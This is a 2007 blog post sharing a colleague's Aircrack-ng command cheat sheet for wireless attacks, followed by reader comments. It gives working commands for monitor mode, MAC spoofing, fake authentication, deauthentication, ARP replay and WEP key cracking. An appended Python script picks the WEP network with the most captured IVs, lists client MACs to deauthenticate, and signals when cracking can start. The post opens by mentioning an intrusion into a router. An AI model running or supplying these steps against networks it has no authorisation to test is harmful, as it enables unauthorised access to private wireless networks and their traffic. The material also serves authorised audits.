Thursday, November 1, 2007

Hacking and Cracking Wireless

One day after intruding into the router, I remembered that my colleague Mark had compiled a list of Aircrack-ng commands for cracking and injection. He was doing a wireless project and wrote down the commands he needed while doing the pentest. Check it out. This is a summarized version of the Aircrack-ng commands; it comes in very handy during a wireless audit and saves you the time needed to read the manuals. Use it in your next wireless audit. Thank you, Mark, for the compilation and your effort.


--------------------------------------------------------------------

install madwifi-ng driver (done! monitor mode working)
install rt73 driver for the D-Link USB (done! monitor mode working)
install rtutilt for rausb0 configuration
install aircrack-ng (done, dev version from svn)



Steps:

#####################################################
CONFIGURATION:

D-Link DWL-G122

ifconfig rausb0 up
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1
iwconfig rausb0 mode monitor
OR
airmon-ng start rausb0 <channel>


NetGear WG511T

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

specify the channel:
iwconfig ath0 channel <n>
########################################################

CHANGING MAC ADDRESS

ifconfig ath0 down
ifconfig ath0 hw ether <new MAC>
ifconfig ath0 up

use macchanger instead (with madwifi-ng, set the MAC on the parent device wifi0 before creating ath0; the VAP inherits it)

#########################################################

INJECTION TESTING

NetGear WG511T
aireplay-ng -9 ath0
===================
D-Link DWL-G122

aireplay-ng -9 rausb0 (if this fails it means no AP was found on the current channel)
Try card-to-card injection below:
====================

Card-To-Card Injection:
Make sure both cards are on the same channel (channel hopping does not work on the D-Link DWL-G122???)
iwlist <device> channel (shows the channel currently set)

aireplay-ng -9 -i ath0 rausb0 (ath0 mimics an access point, rausb0 is tested for injection)
aireplay-ng -9 -i rausb0 ath0 (rausb0 mimics an access point, ath0 is tested for injection)
=====================



########################################################




PACKET CAPTURE:

airodump-ng <device> (find the BSSID and channel of interest first)

Then capture packets on that particular channel:

airodump-ng --channel <n> --bssid <AP MAC> -w dumpfile <device> (ath0 or rausb0)

Notes: capture full packets when using the PTW attack (do not use --ivs; IVs alone are not enough)

MERGING capture files (after resuming a capture; airodump-ng -w dumpfile numbers them dumpfile-01.cap, dumpfile-02.cap, ...)

mergecap -w out.cap test1.cap test2.cap test3.cap

FOR IVS files

use ivstools --merge



############################################################

ATTACKS

You may want to associate with the AP first using fake authentication before any test (-a is the AP's MAC, -h is our card's MAC and must match the MAC the card actually uses):
aireplay-ng --fakeauth=0 -e SSID -a 00:1a:6d:f8:40:d0 -h 06:14:6c:4c:b9:7c ath0

Automatic Association (re-authenticate every 6000 s, one packet per burst, keep-alive every 10 s):
aireplay-ng -1 6000 -o 1 -q 10 -e SSID -a 00:1A:6D:F8:40:D0 -h 06:14:6C:4C:B9:7C ath0




ARP replay (for WEP cracking, PTW method):
if RXQ in the airodump-ng window is > 90 you should see #/s of 200+ (watch #Data: that is the count of packets carrying IVs)

aireplay-ng --arpreplay -b <AP MAC> -h <our MAC> <device>

Deauthentication (aireplay-ng --deauth): to capture a WPA handshake or reveal a hidden SSID
Fake Authentication (aireplay-ng --fakeauth): to authenticate to the AP when needed before we can inject



#############################################################
WEP CRACKING

Using the PTW attack (aircrack-ng 0.9+ only); packets must be ARP (from ARP replay), captured in full

aircrack-ng -z -b <AP MAC> dumpfile*.cap
40-bit key = ~20,000 IVs
104-bit key = ~40,000 IVs

Normal (KoreK) attack
-n 64 tests for 40-bit WEP; remove -n for 104-bit (the default, -n 128)
aircrack-ng -n 64 -a 1 capturefile




#########################################################

RESOLVE MAC Address to IP Address

use netdiscover or ARP tools

##########################################################

Determine the centre frequency of a particular channel
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select the "Wifi Channel Selection and Channel Overlap" tab.
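Added example, not part of the original post or Mark's notes: a small Python helper that ties the PACKET CAPTURE and WEP CRACKING steps together. It reads the CSV that airodump-ng writes next to the .cap when run with "-w dumpfile" (dumpfile-01.csv, a layout assumed here: an access-point table headed "BSSID, First time seen, ...", a blank line, then a station table), picks the WEP network with the most captured IVs, reports whether the count meets the PTW thresholds listed above, lists the clients seen on that BSSID (deauth targets, or a -h MAC for ARP replay), and computes the channel's centre frequency instead of looking it up on the linked calculator. The sample CSV embedded below is constructed; the MACs in it are the ones from the fakeauth command above, everything else is made up.

```python
"""Pick a WEP target from an airodump-ng CSV dump and check PTW readiness.

Added example, not part of the original post or Mark's notes.  It assumes the
CSV that airodump-ng writes alongside the .cap when run with "-w prefix"
(prefix-01.csv): an access-point table whose header begins
"BSSID, First time seen, ...", a blank line, then a station table.  Columns are
looked up by header name, so extra or reordered columns are tolerated; ESSIDs
that contain a comma are not handled.
"""
import csv
import io

# IV counts the post lists for the PTW attack (aircrack-ng -z), keyed by the
# aircrack-ng -n key length (64 = 40-bit WEP, 128 = 104-bit WEP).
PTW_IV_THRESHOLD = {64: 20_000, 128: 40_000}

# Constructed sample in airodump-ng CSV layout; not a real capture.  The MACs
# are the ones used in the post's fakeauth example, the rest is made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:1A:6D:F8:40:D0, 2007-11-01 10:00:01, 2007-11-01 10:12:44, 6, 54, WEP, WEP, OPN, -48, 812, 24613, 0. 0. 0. 0, 7, labwep1,
00:14:6C:11:22:33, 2007-11-01 10:00:05, 2007-11-01 10:12:40, 11, 54, WPA2, CCMP, PSK, -61, 640, 0, 0. 0. 0. 0, 5, corp5,
00:0F:B5:AA:BB:CC, 2007-11-01 10:00:09, 2007-11-01 10:12:39, 1, 11, WEP, WEP, OPN, -70, 301, 3110, 0. 0. 0. 0, 0, ,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
06:14:6C:4C:B9:7C, 2007-11-01 10:01:00, 2007-11-01 10:12:40, -50, 1200, 00:1A:6D:F8:40:D0,
"""


def _read_table(block):
    """Parse one comma-separated table into dicts keyed by stripped header names."""
    rows = list(csv.reader(io.StringIO(block), skipinitialspace=True))
    header = [h.strip() for h in rows[0]]
    table = []
    for row in rows[1:]:
        if not row or not row[0].strip():
            continue
        cells = [c.strip() for c in row]
        # Rows normally end with an empty Key / Probed ESSIDs field; pad or trim
        # defensively so a short or over-long row still lines up with the header.
        cells = (cells + [""] * len(header))[: len(header)]
        table.append(dict(zip(header, cells)))
    return table


def parse_airodump_csv(text):
    """Return (access_points, stations) from the text of an airodump-ng CSV file."""
    normalized = text.replace("\r\n", "\n").strip("\n")
    blocks = [b for b in normalized.split("\n\n") if b.strip()]
    aps = _read_table(blocks[0])
    stations = _read_table(blocks[1]) if len(blocks) > 1 else []
    return aps, stations


def pick_wep_target(aps):
    """Choose the WEP network with the most captured IVs (strongest signal as tie-break)."""
    wep = [ap for ap in aps if ap.get("Privacy", "").startswith("WEP")]
    if not wep:
        return None
    return max(wep, key=lambda ap: (int(ap["# IV"]), int(ap["Power"])))


def ptw_ready(ap, key_bits=128):
    """True if the captured IV count meets the post's PTW threshold for this key length."""
    return int(ap["# IV"]) >= PTW_IV_THRESHOLD[key_bits]


def clients_of(stations, bssid):
    """Station MACs seen on bssid: deauth targets, or a -h MAC for fakeauth/ARP replay."""
    return [s["Station MAC"] for s in stations if s.get("BSSID", "").upper() == bssid.upper()]


def channel_to_mhz(channel):
    """Centre frequency of a 2.4 GHz channel: 2407 + 5*n MHz for 1-13, 2484 MHz for 14."""
    if channel == 14:
        return 2484
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    raise ValueError(f"not a 2.4 GHz channel: {channel}")


def channels_overlap(a, b):
    """802.11b/g DSSS channels are 22 MHz wide, so centres under 25 MHz apart overlap."""
    return abs(channel_to_mhz(a) - channel_to_mhz(b)) < 25


def summarize(text, key_bits=128):
    """Parse the CSV, pick the target and report what the next aireplay-ng step needs."""
    aps, stations = parse_airodump_csv(text)
    ap = pick_wep_target(aps)
    if ap is None:
        return None
    channel = int(ap["channel"])
    return {
        "bssid": ap["BSSID"],
        # Empty ESSID: the beacon carries no name; deauth a client to reveal it.
        "essid": ap["ESSID"] or "<hidden>",
        "channel": channel,
        "mhz": channel_to_mhz(channel) if 1 <= channel <= 14 else None,
        "ivs": int(ap["# IV"]),
        "ptw_ready": ptw_ready(ap, key_bits),
        "clients": clients_of(stations, ap["BSSID"]),
    }


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CSV
    for key, value in (summarize(text) or {}).items():
        print(f"{key:10} {value}")
```

Run it as `python3 pick_target.py dumpfile-01.csv` while airodump-ng is still writing; re-running shows the IV count climbing during ARP replay, and `ptw_ready` flips to true at the thresholds the post gives, which is the moment to start aircrack-ng -z on the .cap.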


#######################################################

Increasing injection Speed

iwconfig device rate 11M


#####################################################


---------------------------------------------------------------------------


The Hacka Man

9 comments:

Anonymous said...

Have you personally tried those commands in pentesting? YES or NO?

Are you using the 'aircrack-ng suite' in MS Windows or Linux? Or in a VM in Windows? Or a Live CD/USB?

Have you tried Auditor/Backtrack/Backtrack2/coWPAtty with success in wireless pentesting??

Do you agree that any 'Certified IT' programme will not accept a 'typo error', especially in a 'Command'?

I'm just curious, and all this brings me to what tools you used in your earlier post regarding gaining access to a router, and how you did it too?

Are you using CommView for WiFi/Cain & Abel/Wireshark?

Anonymous said...

Hi there, Mark here. Thanks for acknowledging me, dude. Here's my response to the previous post. The commands I have noted are not a step-by-step walkthrough on wireless pentesting. I got everything working on my

I am: said...

Here's the link to my blog: http://matat0.blogspot.com

Anonymous said...

Hi, thanks. I tried it and the rt73 is a very good chipset; it supports injection. I can get the key in around 3 minutes with Windows + VMware. Just find the tutorial here: Tutorial Cracking WEP In 3 Minute

Anonymous said...

When you "copy paste" a cracking tutorial, for your own sake please at least try it first. The guy before already pointed out the typo in your command, yet you still didn't find it? What a great certified hacker.
